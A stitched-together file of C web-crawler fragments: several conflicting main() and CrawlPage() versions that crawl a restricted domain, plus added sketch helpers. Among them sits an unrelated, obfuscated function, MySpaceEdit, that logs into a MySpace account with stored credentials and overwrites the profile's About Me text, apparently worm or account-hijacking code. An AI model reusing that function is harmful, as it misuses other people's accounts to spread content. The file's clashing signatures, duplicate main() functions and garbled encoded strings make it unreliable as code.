/*
 * TryGetWebPage - calls the regular GetWebPage multiple times to retrieve pages
 * when curl does not work on the first attempt.
 *
 * Returns 0 if the web page is not retrieved after MAX_TRY attempts, or
 * 1 if the page is successfully curled.
 */
int TryGetWebPage(WebPage* page) {
    if (GetWebPage(page) == 1) {
        sleep(INTERVAL_PER_FETCH);
        return 1;
    } else {
        for (int i = 1; i < MAX_TRY; i++) {
            sleep(INTERVAL_PER_FETCH);
            if (GetWebPage(page) == 1)
                return 1;
        }
        printf("Couldn't retrieve the page at %s. "
               "Skipping this page and crawling the next page.\n", page->url);
        return 0;
    }
}
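/*
 * Note: the crawler functions in this collection (TryGetWebPage, CrawlPage, and
 * the main() drivers below) rely on a WebPage struct and a few fetch constants
 * (MAX_TRY, INTERVAL_PER_FETCH, URL_PREFIX, MAX_HASH_SLOT, ...) that each
 * project defines elsewhere. The definitions below are not from the original
 * sources; they are a minimal sketch reconstructed from how the fields are used
 * (url, html, html_len, depth), shown only so the functions read in context.
 */
typedef struct WebPage {
    char *url;        /* URL of the page, heap-allocated by the caller    */
    char *html;       /* HTML contents filled in by GetWebPage()          */
    size_t html_len;  /* length of the html buffer                        */
    int depth;        /* crawl depth relative to the seed page            */
} WebPage;

#define MAX_TRY            3   /* assumed retry count; the real value is project-specific */
#define INTERVAL_PER_FETCH 1   /* assumed pause in seconds between fetches; also an assumption */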
int MySpaceEdit (struct myspace_d *myspace)
{
    char buf[0x15F90], lpRequest[0x800], tmp[0x800];

    GetWebPage(buf, sizeof(buf), riddle_enc("���=|��prt=r~|"),
               riddle_enc("rwmn�7lov"), riddle_enc("JHW"), "", 0x0);           // www.myspace.com, index.cfm, GET
    LogToFile("tmp.html", buf, "w");

    sprintf(lpRequest,
            "__VIEWSTATE=%s&"
            "ctl00$Main$SplashDisplay$ctl00$Email_Textbox=%s&"
            "ctl00$Main$SplashDisplay$ctl00$Password_Textbox=%s",
            GetHashValue(buf, "__VIEWSTATE", '"', 0x25), myspace->username, myspace->password);
    GetWebPage(buf, sizeof(buf), riddle_enc("�wu��w@���suw@u�"),
               riddle_enc("�����P���a����������_�����P�������"), riddle_enc("TSWX"), lpRequest, 0x0); // secure.myspace.com, index.cfm?fuseaction=login.process, POST
    LogToFile("afterlogin.html", buf, "w");

    if (strstr(buf, riddle_enc("z��An���Ac�Am�����Nj�A��A��Au���B")))
        return(0x0);                                                           // You Must Be Logged-In to do That!

    strcpy(myspace->url, GetHashValue(buf, riddle_enc("���}��||{��E����xz|Ez��"), '"', 0x18)); // profileedit.myspace.com
    GetWebPage(buf, sizeof(buf), riddle_enc("���}��||{��E����xz|Ez��"),
               myspace->url, riddle_enc("JHW"), "", 0x0);                      // profileedit.myspace.com, GET

    sprintf(lpRequest,
            "__EVENTTARGET=&__EVENTARGUMENT=&"
            "__VIEWSTATE=%s&ctl00$ctl00$cpMain$ProfileEditContent$editInterests$hash=%s&"
            "ctl00$ctl00$cpMain$ProfileEditContent$editInterests$SaveTop=Save All Changes&"
            "ctl00$ctl00$cpMain$ProfileEditContent$editInterests$AboutMeTextBox=%s",
            GetHashValue(buf, "__VIEWSTATE", '"', 0x25), GetHashValue(buf, "_hash", '"', 0xE), myspace->editdata);
    strcpy(tmp, lpRequest);

    GetWebPage(buf, sizeof(buf), riddle_enc("���}��||{��E����xz|Ez��"),
               myspace->url, riddle_enc("JHW"), "", 0x0);                      // profileedit.myspace.com, GET
    GetWebPage(buf, sizeof(buf), riddle_enc("���}��||{��E����xz|Ez��"),
               GetHashValue(buf, "name=\"aspnetForm\"", '"', 0x29), riddle_enc("TSWX"), tmp, 0x1); // profileedit.myspace.com, POST

    GetWebPage(NULL, 0x0, "collect.myspace.com", "index.cfm?fuseaction=signout", "GET", "", 0x1);
    LogToFile("logoff.html", buf, "w");

    return(0x1);
}
void CrawlPage(WebPage webpage) {
    char* nexturl = NULL;
    int lastpos = 0;
    int depth = webpage.depth + 1;

    if (depth > maxWebPageDepth) return;

    printf("\n\n[crawler]: Crawling - %s\n\n", webpage.url);

    while ((lastpos = GetNextURL(webpage.html, lastpos, webpage.url, &nexturl)) > 0) {
        NormalizeURL(nexturl);
        if (!CheckURL(nexturl)) {
            // setup new page
            struct WebPage* newwebpage = (WebPage*)calloc(1, sizeof(WebPage));
            newwebpage->url = (char*)calloc(strlen(nexturl) + 1, sizeof(char));
            strcpy(newwebpage->url, nexturl);
            newwebpage->depth = depth;

            // get new webpage
            if (GetWebPage(newwebpage)) {
                if (HashTableInsert(nexturl)) {  // if not found in hash table, add to hash table
                    printf("[crawler]: Parser found new link - %s\n", nexturl);
                    struct ListNode* listentry = (ListNode*)calloc(1, sizeof(ListNode));
                    listentry->page = newwebpage;
                    // then add to list
                    WebPageList->tail = InsertNode(WebPageList->tail, listentry);
                    // then write file
                    WriteFile(*newwebpage, filenum++);
                } else {
                    CleanUpPage(newwebpage);
                }
            } else {
                // fetch failed: release the page instead of leaking it
                CleanUpPage(newwebpage);
            }
        }
        free(nexturl);
        nexturl = NULL;

        // sleep for a second between fetches
        sleep(INTERVAL_PER_FETCH);
    }
}
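/*
 * CrawlPage() above releases duplicate or failed pages through CleanUpPage(),
 * which is defined elsewhere in the project. The version below is not the
 * original; it is only a minimal sketch, assuming the page owns its url and
 * html buffers.
 */
void CleanUpPage(WebPage* page) {
    if (page == NULL) return;
    free(page->url);   // allocated in CrawlPage with calloc
    free(page->html);  // filled in by GetWebPage; may be NULL if the fetch failed
    free(page);
}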
int main(int argc, char* argv[])
{
    // check the number of arguments
    if (argc != 4) {
        printf("Invalid Input Argument\n");
        printHelp();
        exit(1);
    }

    // directory file path
    int dirSize = strlen(argv[2]);
    char dir[dirSize + 1];
    dir[0] = '\0';
    strcat(dir, argv[2]);

    int urlSize = strlen(argv[1]);
    char inputURL[urlSize + 1];
    inputURL[0] = '\0';
    strcat(inputURL, argv[1]);

    // get the max depth number
    int inputDepth = atoi(argv[3]);

    // check that a valid depth is provided
    if (inputDepth > 4 || inputDepth < 0) {
        printf("Invalid [depth]\n");
        printHelp();
        exit(1);
    }

    // check for URL validity
    if (!strstr(inputURL, URL_PREFIX)) {
        printf("Invalid input [seed url]\n");
        printHelp();
        exit(1);
    }

    // check for directory location validity
    DIR* directory = opendir(dir);
    if (directory) {
        closedir(directory);
    } else if (ENOENT == errno) {
        printf("Directory does not exist\n");
        printHelp();
        exit(1);
    } else {
        printf("Directory can't be opened\n");
        printHelp();
        exit(1);
    }

    // init curl
    curl_global_init(CURL_GLOBAL_ALL);

    // setup seed page
    WebPage* seedWebPage = calloc(1, sizeof(WebPage));              // memory allocation for the seed webpage
    seedWebPage->url = calloc(strlen(inputURL) + 1, sizeof(char)); // memory allocation for the seed URL
    seedWebPage->url[0] = '\0';
    strcat(seedWebPage->url, inputURL);
    seedWebPage->depth = 0;
    seedWebPage->html = NULL;

    // initialize data structures
    HashTable* visitedURLHash = initHashTable();
    List* webPageList = initializeList();
    webPageList->head->page = seedWebPage;

    // get seed webpage
    if (GetWebPage(seedWebPage)) {
        // write seed file
        FILE *fPointer;
        char* pathVar1 = pathToDirectory(dir, fileNumber);
        fPointer = fopen(pathVar1, "w");
        free(pathVar1);
        writeHTMLtoFile(fPointer, seedWebPage);
        //free(fPointer);

        if (inputDepth == 0) {
            curl_global_cleanup();
            free(seedWebPage->html);
            free(seedWebPage->url);
            free(seedWebPage);
            // free webPageList and the hashtable
            free(webPageList);
            for (int i = 0; i < MAX_HASH_SLOT; i++) {
                free(visitedURLHash->table[i]->url);
                free(visitedURLHash->table[i]);
            }
            free(visitedURLHash);
            return 0;
        }
        fileNumber += 1;
        depth += 1;
        HashTableInsert(visitedURLHash, seedWebPage->url);  // mark as visited

        // extract urls from seed page
        char * result;
        int pos = 0;
        while ((pos = GetNextURL(seedWebPage->html, pos, seedWebPage->url, &result)) > 0) {
            if (NormalizeURL(result) && strstr(result, URL_PREFIX)) {
                strtok(result, "#");
                // if not already in the hashtable, add it to the hashtable and to the webPageList
                if (HashTableLookup(visitedURLHash, result) == 0) {
                    HashTableInsert(visitedURLHash, result);
                    AppendList(webPageList, webPageInit(result, depth));
                }
            }
            free(result);  // webPageInit and HashTableInsert copy the url, so result is always freed here
        }
        if (webPageList->head->next->next == NULL) {  // seed redirect case
            webPageList->head->next->page->depth = 0;
            fileNumber = 1;
        }
        tempWebPage = PopList(webPageList);  // get rid of the visited seed page
    } else {
        curl_global_cleanup();
        tempWebPage = PopList(webPageList);
        free(seedWebPage->html);
        free(seedWebPage->url);
        free(seedWebPage);
        //free(tempWebPage);
        free(webPageList);
        for (int i = 0; i < MAX_HASH_SLOT; i++) {
            free(visitedURLHash->table[i]->url);
            free(visitedURLHash->table[i]);
        }
        free(visitedURLHash);
        exit(1);
    }

    // while there are urls to crawl
    while (webPageList->head != NULL && webPageList->tail != NULL) {
        // get the webpage for the next url
        tempWebPage = PopList(webPageList);
        if (GetWebPage(tempWebPage)) {
            // write the page file
            char* pathVar = pathToDirectory(dir, fileNumber);
            FILE *fPointer = fopen(pathVar, "w");
            free(pathVar);
            printf("Found link: %s\n", tempWebPage->url);
            writeHTMLtoFile(fPointer, tempWebPage);
            fileNumber += 1;

            if ((tempWebPage->depth + 1) <= inputDepth) {
                char * resultTemp;
                int posTemp = 0;
                while ((posTemp = GetNextURL(tempWebPage->html, posTemp, tempWebPage->url, &resultTemp)) > 0) {
                    if (NormalizeURL(resultTemp) && strstr(resultTemp, URL_PREFIX)) {
                        strtok(resultTemp, "#");
                        // insert into the hashtable and the webPageList if not already present
                        if (HashTableLookup(visitedURLHash, resultTemp) == 0) {
                            HashTableInsert(visitedURLHash, resultTemp);
                            AppendList(webPageList, webPageInit(resultTemp, tempWebPage->depth + 1));
                        }
                    }
                    free(resultTemp);
                }
            }
            free(tempWebPage->url);
            free(tempWebPage->html);
            free(tempWebPage);
        } else {
            free(tempWebPage->url);
            free(tempWebPage->html);
            free(tempWebPage);
        }
        sleep(INTERVAL_PER_FETCH);
    }

    // cleanup curl
    curl_global_cleanup();

    free(seedWebPage->url);
    free(seedWebPage->html);
    free(seedWebPage);
    free(webPageList);

    // free the hashtable
    for (int i = 0; i < MAX_HASH_SLOT; i++) {
        if (visitedURLHash->table[i]->url != NULL) {
            HashTableNode* currNode = visitedURLHash->table[i];
            while (currNode->next != NULL) {
                HashTableNode* tempNode = currNode;
                currNode = currNode->next;
                free(tempNode->url);
                free(tempNode);
            }
            free(currNode->url);
            free(currNode);
        } else {
            free(visitedURLHash->table[i]);
        }
    }
    free(visitedURLHash);
    return 0;
}
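/*
 * The main() above builds each output path with pathToDirectory(dir, fileNumber)
 * and frees the returned string after fopen(). That helper is defined elsewhere;
 * the version below is only a sketch, assuming it returns a heap-allocated
 * "<dir>/<fileNumber>" string.
 */
char* pathToDirectory(char* dir, int fileNumber) {
    // room for the directory, '/', a decimal file number, and the terminating NUL
    char* path = calloc(strlen(dir) + 16, sizeof(char));
    if (path != NULL) {
        sprintf(path, "%s/%d", dir, fileNumber);
    }
    return path;  // the caller is responsible for free()
}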
/* ========================================================================== */
int main(int argc, char* argv[])
{
    int filenum = 1;
    int initdepth = 1;

    // check command line arguments
    if (argcheck(argc, argv) == 1) {
        exit(1);
    }
    char *starturl = argv[1];
    char *targetdir = argv[2];
    int depth = atoi(argv[3]);

    // initialize our hashtable and url list
    HashTable *myhashtable;
    List *mylist;
    myhashtable = initializeHashTable();
    mylist = initializelist();

    // init curl
    curl_global_init(CURL_GLOBAL_ALL);

    // setup seed page
    WebPage *startpage = createWebPage(starturl, 0);

    // get seed webpage; if the url is invalid, quit and print an error message
    if (GetWebPage(startpage) == 0) {
        printf("The url that you entered was invalid. Please try again.\n");
        free(startpage->html);
        free(startpage);
        exit(1);
    }

    // write seed file
    createfile(startpage, targetdir, filenum);
    filenum++;

    // add seed page to hashtable
    insertHashTable(myhashtable, startpage->url);

    // extract urls from seed page
    if (depth > 0) {
        parseHTML(startpage, mylist, myhashtable, initdepth);
    }

    // while there are urls to crawl
    while (mylist->head != NULL) {
        // get next url from list
        WebPage *nextpage = listpop(mylist);
        int currdepth = nextpage->depth;

        // get webpage for url; if the fetch fails, just free the memory
        if (GetWebPage(nextpage) != 0) {
            createfile(nextpage, targetdir, filenum);
            filenum++;
            // extract urls from webpage
            if (currdepth < depth) {
                parseHTML(nextpage, mylist, myhashtable, currdepth + 1);
            }
        }
        free(nextpage->html);
        free(nextpage->url);
        free(nextpage);
        sleep(SLEEPTIME);
    }

    // cleanup
    free(startpage->html);
    free(startpage);
    freeHashTable(myhashtable);
    freelist(mylist);
    curl_global_cleanup();
    return 0;
}
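/*
 * This version wraps seed-page setup in createWebPage(url, depth), whose
 * definition is not included here. A minimal sketch consistent with the call
 * site (url plus depth, html left empty) is shown below; whether the original
 * copies or merely aliases the url string is an assumption.
 */
WebPage *createWebPage(char *url, int depth) {
    WebPage *page = calloc(1, sizeof(WebPage));
    if (page == NULL) return NULL;
    page->url = calloc(strlen(url) + 1, sizeof(char));
    if (page->url == NULL) { free(page); return NULL; }
    strcpy(page->url, url);
    page->depth = depth;   // html and html_len stay zeroed from calloc
    return page;
}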
int main(int argc, char* argv[])
{
    // check command line arguments

    // Check that there are three input parameters.
    if (argc != 4) {
        printf("Please input three parameters: seed URL, directory, and max depth.\n");
        return 1;
    }

    // Check that the seed url has the proper domain (old-www).
    if (strncmp(argv[1], URL_PREFIX, 15) != 0) {
        printf("The seed URL domain must be old-www.\n");
        return 1;
    }

    // Check that the directory already exists; if not, terminate the program.
    struct stat st;
    if (!(stat(argv[2], &st) == 0 && S_ISDIR(st.st_mode))) {
        printf("The directory %s cannot be found. Please enter an existing directory.\n", argv[2]);
        return 1;
    }

    // Check that the directory path does not end with '/' for ease in writing filenames.
    if (argv[2][strlen(argv[2]) - 1] == '/') {
        printf("Please do not add '/' at the end of the directory path.\n");
        return 1;
    }

    // Check the third argument:
    // loop through each character of the depth argument and check that it is indeed a digit.
    for (int i = 0; i < strlen(argv[3]); i++) {
        if (!isdigit((int)argv[3][i])) {
            printf("Please input a valid number for the depth.\n");
            return 1;
        }
    }
    sscanf(argv[3], "%d", &depth);  // store the argument as an integer

    // Check that the depth specified does not exceed the max depth.
    if (depth > MAX) {
        printf("Search depth cannot exceed MAX depth of 4. Please enter a valid depth.\n");
        return 1;
    }

    // init curl
    curl_global_init(CURL_GLOBAL_ALL);

    // setup seed page
    WebPage *page = calloc(1, sizeof(WebPage));
    page->url = (char *)malloc(strlen(argv[1]) + 1);
    MALLOC_CHECK(stderr, page->url);   // check that memory was allocated
    strcpy(page->url, argv[1]);        // copy the seed url to page->url

    // get seed webpage
    if (!GetWebPage(page)) {
        printf("The seed URL is invalid. Please enter a valid seed URL.\n");
        FreeWebMemory(page);
        return 1;
    }

    // normalize the seed url
    if (!NormalizeURL(page->url)) {
        printf("Seed URL cannot be normalized.\n");
        FreeWebMemory(page);
        return 1;
    }

    // write seed file
    strcpy(path, argv[2]);   // let path hold the directory path
    WriteFile(page, path, pageID);

    // add seed page to hashtable
    if (!AddToHashTable(page->url)) {
        FreeWebMemory(page);
        return 1;
    }

    // initialize URLList
    if (!InitList()) {
        FreeWebMemory(page);
        return 1;
    }

    // extract urls from seed page
    if (!CrawlPage(page)) {
        FreeHashTable();   // free all memory dynamically allocated to the hash table
        FreeWebMemory(page);
        return 1;
    }

    // while there are urls to crawl
    while (URLList.tail != NULL) {
        // get next webpage from list
        WebPage *next = PopList();

        // write page file
        pageID++;
        if (!WriteFile(next, argv[2], pageID)) {   // check that WriteFile worked
            FreeWebMemory(next);
            return 1;
        }

        // extract urls from the webpage, then clean up
        CrawlPage(next);
        FreeWebMemory(next);
    }

    // memory cleanup
    FreeHashTable();      // free memory dynamically allocated to the hash table
    FreeWebMemory(page);  // free memory dynamically allocated to the WebPage variable

    // cleanup curl
    curl_global_cleanup();
    return 0;
}
// Function to crawl a given webpage for links.
int CrawlPage(WebPage *wp)
{
    char *result;       // variable to hold each url found
    int pos = 0;        // position in the html page
    WebPage *newPage;   // new webpage

    // Check that the depth does not exceed the max depth passed in.
    if (wp->depth >= depth) {
        return 0;
    }

    printf("\n");
    printf("[crawler]: Crawling - %s\n", wp->url);   // print the url being curled
    printf("\n");

    // Loop through the html page to get all of its urls.
    while ((pos = GetNextURL(wp->html, pos, wp->url, &result)) >= 0) {
        // Check that the url has the proper domain (old-www).
        if (strncmp(result, URL_PREFIX, strlen(URL_PREFIX)) != 0) {
            free(result);
            continue;
        }
        // Normalize the url.
        if (!NormalizeURL(result)) {
            free(result);
            continue;
        }
        // Check that the url isn't already in the hash table.
        if (!InHashTable(result)) {
            AddToHashTable(result);   // add the url to the hash table

            // Setup a new page for the url.
            newPage = calloc(1, sizeof(WebPage));
            newPage->depth = wp->depth + 1;
            newPage->url = (char *)malloc(strlen(result) + 1);
            if (!newPage->url) {   // check that memory was allocated
                continue;
            }
            strcpy(newPage->url, result);

            // Get the html for the url.
            if (!GetWebPage(newPage)) {
                FreeWebMemory(newPage);
                free(result);
                continue;
            }
            printf("[crawler]: Parser found link - %s\n", result);

            // Add to the list of webpages to be visited.
            if (!AppendList(newPage)) {
                free(result);
                return 0;
            }
        }
        free(result);
    }
    return 1;
}
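/*
 * main() and CrawlPage() in this version release pages through FreeWebMemory(),
 * which is defined elsewhere. A minimal sketch, under the assumption that the
 * page owns its url and html buffers:
 */
void FreeWebMemory(WebPage *wp) {
    if (wp == NULL) return;
    free(wp->url);
    free(wp->html);
    free(wp);
}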
// main crawler function
int main(int argc, char* argv[])
{
    // local variables
    FILE *fp;        // file pointer for html files
    char *nextURL;   // pointer to the next URL found on the seed page
    char *newURL;    // pointer to the next URL in the while loop

    // check command line arguments
    if (argc != 4) {
        printf("Incorrect number of arguments provided.\n");
        exit(1);
    }

    // check that the second argument is a directory
    stat(argv[2], &statbuffer);
    if (!S_ISDIR(statbuffer.st_mode)) {
        printf("Error, you did not supply a valid directory\n");
        exit(1);
    }

    // get arguments
    char *seedURL = argv[1];
    int filename_len = strlen(argv[2]) + 21;   // room for the directory path plus a file number
    char *filename = calloc(filename_len, sizeof(char));

    // check the maxDepth
    int value = is_numeric(argv[3]);
    if (value != 0) {
        sscanf(argv[3], "%i", &maxDepth);
    } else {
        printf("Error! maxDepth must be a number\n");
        exit(1);
    }

    // init curl
    curl_global_init(CURL_GLOBAL_ALL);

    // initialize data structures/variables

    // initialize hashtable
    HashTable *table = malloc(sizeof(HashTable));
    memset(table, 0, sizeof(HashTable));   // zero the whole table (the original zeroed only MAX_HASH_SLOT bytes)

    // initialize linked list
    List *WebPageList;
    WebPageList = createList();

    // setup seed page
    // get seed webpage; if it fails, report and exit
    if (NormalizeURL(seedURL) == 0) {
        printf("Error, bad URL\n");
        exit(1);
    }

    // create the seed WebPage object by allocating memory
    WebPage *seedPage = malloc(sizeof(WebPage));
    // assign values to each part of the struct
    seedPage->url = seedURL;
    seedPage->html = NULL;
    seedPage->html_len = 0;
    seedPage->depth = 0;

    // try to get the webpage up to MAX_TRY times
    if (!GetWebPage(seedPage)) {
        for (tries = 0; tries < MAX_TRY; tries++) {
            if (GetWebPage(seedPage)) {
                break;
            }
        }
    }

    // write the html contents to a file "1" in the given directory
    sprintf(filename, "%s/%d", argv[2], 1);
    fp = fopen(filename, "w");
    fputs(seedURL, fp);
    fputs("\n", fp);
    fprintf(fp, "%d\n", seedPage->depth);
    fputs(seedPage->html, fp);

    // close the file and wipe the filename
    fclose(fp);
    memset(filename, '\0', filename_len);

    // add seed page to hashtable
    add(table, seedURL);

    // extract urls from seed page
    // while there are still URLs in the seed page's html
    while ((pos = GetNextURL(seedPage->html, pos, seedPage->url, &nextURL)) > 0) {
        // only visit them if it wouldn't exceed maxDepth
        if ((seedPage->depth + 1) > maxDepth) {
            free(seedPage);
            exit(1);
        }
        // ensure it is a valid url
        if (NormalizeURL(nextURL) != 0) {
            // also check that it is in the right domain
            if (strncmp(URL_PREFIX, nextURL, strlen(URL_PREFIX)) == 0) {
                // if add() succeeds, this is a unique URL that hasn't been
                // visited before, so put it on the linked list of URLs to visit
                if (add(table, nextURL)) {
                    // create a new webpage object
                    WebPage *pages = malloc(sizeof(WebPage));
                    pages->url = nextURL;
                    pages->html = NULL;
                    pages->html_len = 0;
                    pages->depth = 1;

                    // try to get the webpage up to MAX_TRY times
                    tries = 0;
                    if (!GetWebPage(pages)) {
                        for (tries = 0; tries < MAX_TRY; tries++) {
                            if (GetWebPage(pages)) {
                                break;
                            }
                        }
                    }
                    // add it to the linked list
                    addToEnd(WebPageList, pages);
                }
            }
        }
    }

    // while there are urls to crawl
    while (WebPageList->head != NULL) {
        // get the next url from the list
        WebPage *nextPage = removeFromFront(WebPageList);   // (the original also malloc'd here first, leaking that allocation)

        // try to get the webpage up to MAX_TRY times
        tries = 0;
        if (!GetWebPage(nextPage)) {
            for (tries = 0; tries < MAX_TRY; tries++) {
                if (GetWebPage(nextPage)) {
                    break;
                }
            }
        }

        // write the page file
        sprintf(filename, "%s/%d", argv[2], docNum);
        fp = fopen(filename, "w");
        fputs(nextPage->url, fp);
        fputs("\n", fp);
        fprintf(fp, "%d\n", nextPage->depth);
        fputs(nextPage->html, fp);

        // close the file and wipe the filename (to be used next time)
        fclose(fp);
        memset(filename, '\0', filename_len);

        // increment the doc num
        docNum++;

        // check whether visiting the URLs on this page would exceed maxDepth
        if ((nextPage->depth + 1) > maxDepth) {
            free(nextPage);
            continue;
        }

        pos = 0;
        // iterate through all the URLs on the page
        while ((pos = GetNextURL(nextPage->html, pos, nextPage->url, &newURL)) > 0) {
            // check that the URL is in the proper format
            if (NormalizeURL(newURL) != 0) {
                // check that it is in the right domain
                if (strncmp(URL_PREFIX, newURL, strlen(URL_PREFIX)) == 0) {
                    // only add new URLs to the list
                    if (add(table, newURL) != 0) {
                        // create a new WebPage object
                        WebPage *page = malloc(sizeof(WebPage));
                        page->url = newURL;
                        page->html = NULL;
                        page->html_len = 0;
                        page->depth = nextPage->depth + 1;

                        // try to get the webpage up to MAX_TRY times
                        tries = 0;
                        if (!GetWebPage(page)) {
                            for (tries = 0; tries < MAX_TRY; tries++) {
                                if (GetWebPage(page)) {
                                    break;
                                }
                            }
                        }
                        // add the page to the linked list
                        addToEnd(WebPageList, page);
                    }
                }
            }
        }

        // Sleep for a bit to avoid annoying the target
        sleep(INTERVAL_PER_FETCH);

        // Free resources
        free(nextPage);
    }

    // cleanup curl
    curl_global_cleanup();

    // free resources

    // free the hashtable: walk every slot's chain, not just the seed URL's slot
    for (int slot = 0; slot < MAX_HASH_SLOT; slot++) {
        HashTableNode *freer = table->table[slot];
        HashTableNode *tempHash = NULL;
        while (freer != NULL) {
            tempHash = freer;
            freer = freer->next;
            free(tempHash);
        }
    }
    free(table);

    // free the linked list
    free(WebPageList);

    // free the seed WebPage and filename pointer
    free(seedPage);
    free(filename);

    return 0;
}
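/*
 * The fetch-with-retry pattern above is repeated three times (seed page, seed
 * links, crawl loop). Purely as a refactoring sketch -- not part of the original
 * source -- the same behavior could be factored into one helper:
 */
static int FetchWithRetries(WebPage *page) {
    if (GetWebPage(page)) {
        return 1;
    }
    for (int tries = 0; tries < MAX_TRY; tries++) {
        if (GetWebPage(page)) {
            return 1;
        }
    }
    return 0;   // the page could not be fetched even after the retries
}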
int main(int argc, char* argv[])
{
    filenum = 1;

    // check command line arguments
    if (argc != 4) {                        // check number of arguments
        fprintf(stderr, "Error: Number of input arguments needs to be exactly 3\n");
        return -1;
    } else if (CheckDirectory(argv[2])) {   // check if directory exists
        return -1;
    } else if (CheckDepth(argv[3])) {       // check depth
        return -1;
    } else if (CheckURL(argv[1])) {         // check url
        fprintf(stderr, "Error: Invalid URL. Can only crawl URLs with URL prefix %s\n", URL_PREFIX);
        return -1;
    }

    // init curl
    curl_global_init(CURL_GLOBAL_ALL);

    // setup seed page
    seedPage = (WebPage*)calloc(1, sizeof(WebPage));
    NormalizeURL(seedURL);
    seedPage->url = (char*)calloc(strlen(seedURL) + 1, sizeof(char));
    strcpy(seedPage->url, seedURL);
    seedPage->depth = 0;

    // get seed webpage
    if (!GetWebPage(seedPage)) {   // clean up and exit if the url is invalid
        fprintf(stderr, "Error: Invalid URL\n");
        curl_global_cleanup();
        return -1;
    }

    // write seed file
    WriteFile(*seedPage, filenum++);

    // exit if maxWebPageDepth is 0
    if (maxWebPageDepth == 0) {    // clean up and exit if max webpage depth is 0
        printf("\n[crawler]: Crawling - %s\n\n", seedPage->url);
        printf("1 page has been crawled\n\n");
        CleanUpPage(seedPage);
        CleanUpHash(URLsVisited);
        curl_global_cleanup();
        return 0;
    }

    // add seed page to hashtable
    InitialiseHashTable(URLsVisited);
    HashTableInsert(seedURL);

    // add seed node to list
    WebPageList = (List*)calloc(1, sizeof(List));
    struct ListNode* seednode = (ListNode*)calloc(1, sizeof(ListNode));
    seednode->page = seedPage;
    WebPageList->head = seednode;
    WebPageList->tail = seednode;

    // extract urls from seed page
    CrawlPage(*seedPage);
    WebPageList->head = RemoveNode(WebPageList->head);

    // while there are urls to crawl
    while (WebPageList->head != NULL && WebPageList->head->page->depth < maxWebPageDepth) {
        // get next url from list, get webpage for url, write page file and extract urls from webpage
        CrawlPage(*(WebPageList->head->page));
        WebPageList->head = RemoveNode(WebPageList->head);
    }

    // cleanup memory
    CleanUpList(WebPageList);
    CleanUpHash(URLsVisited);

    // cleanup curl
    curl_global_cleanup();

    printf("\n\n%d webpages have been crawled\n\n", filenum - 1);
    return 0;
}
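/*
 * CheckURL() is shared by this main() and the CrawlPage() shown earlier (the
 * one using WebPageList and maxWebPageDepth), but its definition is not
 * included. From the two call sites it appears to return 0 for a crawlable URL
 * and nonzero otherwise; the body below is only a sketch under that assumption.
 */
int CheckURL(char* url) {
    // reject anything outside the allowed URL_PREFIX domain
    if (url == NULL || strncmp(url, URL_PREFIX, strlen(URL_PREFIX)) != 0) {
        return 1;
    }
    return 0;
}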